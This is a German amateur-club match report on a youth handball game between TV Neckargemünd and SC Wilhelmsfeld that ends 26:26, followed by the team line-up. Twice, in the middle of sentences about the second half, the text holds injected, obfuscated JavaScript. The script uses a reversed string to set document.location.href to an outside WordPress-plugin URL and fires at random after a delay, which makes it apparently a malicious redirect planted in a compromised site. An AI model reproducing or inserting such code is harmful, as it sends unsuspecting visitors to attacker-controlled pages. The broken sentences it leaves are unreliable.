Nachdem der TVN in der letzten Saison keine C-Jugend stellen konnte, fand sich in dieser Saison fast die „alte Riege“ von vor zwei Jahren wieder. Zum Auftakt ging es zum SC Wilhelmsfeld. Nach Startschwierigkeiten in der ersten Halbzeit rissen die Jungs das Ruder in der zweiten Halbzeit herum und gingen am Ende mit einem verdienten Unentschieden vom Platz.
Wilhelmsfeld, 16.01.2017 (tb) – Mit acht Jungs ging es an den Start, sodass mit nur einer Auswechselmöglichkeit alle Spieler konditionell gleich stark gefordert waren.
In der ersten Hälfte starteten unsere Jungs eher holprig, waren immer wieder unaufmerksam in der Abwehr und wollten umgekehrt im Angriff zu schnell zu viel. Zwischendurch zeigten sie aber auch wiederholt gute, schnelle und durchdachte Spielzüge. Wie beherzt sie spielten zeigen auch drei gelbe Karten in der ersten Halbzeit. Wilhelmsfeld war in der ersten Halbzeit insgesamt wacher und sortierter, sodass unsere Mannschaft den Anschluss zwar nicht verlor, aber doch immer mit 3-5 Toren Unterschied hinterher hinkte. So gingen die Jungs denn auch mit drei Toren Rückstand in die Halbzeitpause (15:12).
Was auch immer die Trainer Alex und Paul mit den Jungs während der Pause gemacht haben, es hat gewirkt. In den ersten Minuten der zweiten Halbzeit konnte die Mannschaft bei gleichzeitigen Gegentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toren den Abstand zunächst verkürzen. Und in der dreifach aufeinander folgenden Unterzahl unserer Mannschaft, nahmen die Jungs so richtig Fahrt auf. Das Spiel wurde nicht nur gesammelter und ein besseres Miteinander, sondern die Mannschaft machte einen regelrechten Krimi daraus, der jeden Sonntag Abend – Tatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort in den Schatten stellt. Das Spiel wurde immer rasanter und den Jungs gelang in der 36.min der Ausgleich. Ab der 40.min wechselten sich Neckargemünd und Wilhelmsfeld mit der Führung um einen Punkt ab. Dass zudem Flo wie ein Fels in der Brandung im Tor stand und etliche „Klopper“ an ihm abprallten, tat sein übriges. Am Ende schlossen unsere kämpferischen Jungs ihr erstes Saisonspiel verdient und glücklich mit einem 26:26 ab.
Die Darsteller im Samstag Abend Krimi waren:
Florian (im Tor), Lasse (2), Felix (5), Marlon (7), Robin (9), Justus (11), Philipp (13), Jan (14)